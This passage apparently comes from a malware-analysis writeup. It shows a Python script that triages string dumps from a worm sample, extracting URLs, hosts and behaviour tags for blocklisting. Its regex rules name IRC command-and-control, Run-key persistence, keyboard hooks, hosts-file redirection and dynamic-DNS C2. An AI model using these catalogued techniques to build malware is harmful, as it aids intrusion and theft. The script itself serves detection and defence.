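HEADER_RE = re.compile(r"^(?P<name>\S+_\d+(?:_rwx_[0-9A-Fa-f]{8}_[0-9A-Fa-f]{8})?):$")
URL_RE = re.compile(r"https?://[^\s)\"']+")
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9-]*(?:\.[A-Za-z0-9-]+)+(?::\d{1,5})?$")
# Assumption: a deliberately small TLD allowlist, so DLL/EXE/INI names
# (wininet.dll, setting.ini, ...) are never mistaken for hosts.
HOST_TLDS = {"com", "net", "org", "cn", "pl", "ru", "info", "biz", "cc", "tw", "hk"}

# (tag, pattern): literal forms taken from the dumps in this report.
RULES = [
    ("irc-c2", re.compile(r"^(NICK|JOIN|PRIVMSG)\b|\.(zief|ircgalaxy)\.pl$", re.IGNORECASE)),
    ("hosts-file-redirect", re.compile(r"^127\.0\.0\.1\s+\S+")),
    ("firewall-allowlist", re.compile(r":\*:enabled:@shell32\.dll,-1")),
    ("run-key-persistence", re.compile(r"CurrentVersion\\run$", re.IGNORECASE)),
    ("ddos-section", re.compile(r"^`?\.(Ddos|Attack|Socket)\b")),
    ("spoofed-crawler-ua", re.compile(r"User-Agent:.*Baiduspider", re.IGNORECASE)),
    ("taskkill", re.compile(r"taskkill\s+/im", re.IGNORECASE)),
    ("smtp-headers", re.compile(r"^(Reply-To|From|To|Subject|Cc): %s$|^SMTP$")),
    ("keyboard-hook", re.compile(r"^(SetWindowsHookExA|GetAsyncKeyState)$")),
    ("dyndns-c2", re.compile(r"\.3322\.org(:\d+)?$", re.IGNORECASE)),
]


def parse_dumps(text):
    """Return {dump_name: [unique strings, first-seen order]} for each block."""
    dumps, current = {}, None
    for line in text.splitlines():
        line = line.rstrip("\r")
        m = HEADER_RE.match(line)
        if m:                                   # start of a new dump block
            current = m.group("name")
            dumps.setdefault(current, [])
        elif current is not None and line and line not in dumps[current]:
            dumps[current].append(line)         # skips the renderer's duplicate copy
    return dumps


def refang(s):
    """Undo the report's defanging so the IOCs match what is seen on the wire."""
    s = re.sub(r"hXXp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return re.sub(r"(?<![A-Za-z0-9])VVV\.", "www.", s)


def host_candidate(s):
    """Return s if it is a bare host[:port] with an allowed TLD, else None."""
    if not HOST_RE.match(s):
        return None
    host = s.split(":", 1)[0]
    return s if host.rsplit(".", 1)[1].lower() in HOST_TLDS else None


def extract_iocs(dumps):
    """Walk every dump; collect URLs, bare hosts and tagged behaviour strings."""
    iocs = {"urls": [], "hosts": [], "indicators": []}
    for name, strings in dumps.items():
        for s in map(refang, strings):
            for url in URL_RE.findall(s):
                if url not in iocs["urls"]:
                    iocs["urls"].append(url)
            host = host_candidate(s)
            if host and host not in iocs["hosts"]:
                iocs["hosts"].append(host)
            iocs["indicators"].extend((name, tag, s) for tag, rx in RULES if rx.search(s))
    return iocs


def triage(text):
    """Parse and classify; returns the IOC dict plus the sorted set of tags hit."""
    iocs = extract_iocs(parse_dumps(text))
    iocs["tags"] = sorted({tag for _, tag, _ in iocs["indicators"]})
    return iocs


if __name__ == "__main__":
    result = triage(SAMPLE_DUMP)
    for key in ("urls", "hosts", "tags"):
        print(f"{key}: {result[key]}")
    for name, tag, s in result["indicators"]:
        print(f"  [{tag}] {name}: {s}")
```

Feed it the whole section (for example `triage(open("strings.txt").read())`) and the `hosts` and `urls` lists are what goes into a blocklist, while `tags` gives the behaviour summary that the report's one-word "EmailWorm" verdict leaves out. The TLD allowlist errs toward silence: a host on a TLD not in the set is simply not reported, so extend it before trusting a clean `hosts` result.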